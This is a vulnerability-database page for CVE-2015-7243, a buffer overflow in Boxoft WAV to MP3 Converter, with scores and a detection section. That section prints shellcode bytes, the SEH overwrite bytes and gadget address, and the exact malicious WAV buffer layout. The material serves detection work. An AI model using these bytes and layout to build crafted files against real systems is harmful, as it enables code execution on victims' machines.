cbcvebase.
CVE-2015-7243
published 2015-09-18

CVE-2015-7243: Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted…

PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
58.27%
99.0th percentile
Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted WAV file.

Detection & IOCsextracted from sources · hover to see the quote

filenamecrash3r.wav
filenamemusic.wav
registry0x0040144c
processwavtomp3.exe
bytes
\xeb\x06\x90\x90
bytes
\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7
  • Trigger condition: a crafted WAV file exceeding 4000 bytes (specifically 4132-byte padding before SEH overwrite) causes a stack buffer overflow when converted to MP3 in Boxoft WAV to MP3 Converter.
  • SEH-based exploit: look for the short-jump NOP sled pattern \xeb\x06\x90\x90 immediately followed by the P/P/R ROP gadget address 0x0040144c packed little-endian (\x4c\x14\x40\x00) within a WAV file opened by wavtomp3.exe.
  • The Metasploit module drops a malicious WAV file (default name music.wav) with a null-byte bad-char constraint (\x00); monitor file-creation events for anomalously large WAV files written by non-audio applications.
  • The exploit targets wavtomp3.exe version 1.1.0.0 specifically; the P/P/R gadget at 0x0040144c is only valid for that binary version — version fingerprinting of the process can confirm exploitation attempt.
  • Buffer layout: 4132 bytes of padding + 4-byte nSEH (\xeb\x06 + 2 bytes) + 4-byte SEH (ROP gadget) + shellcode + ~5860 bytes of padding. Detect WAV files with this total size profile (~10000 bytes) submitted to the converter.
  • ·The P/P/R ROP gadget address 0x0040144c is hardcoded and specific to wavtomp3.exe version 1.1.0.0 only; the exploit will not work against version 1.0 without a different gadget address.
  • ·The Metasploit module targets Windows platform only and is a file-format (client-side) exploit requiring user interaction to open/convert the malicious WAV file.
  • ·Null byte (\x00) is a bad character for the payload; any shellcode used must avoid null bytes or the exploit will fail.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.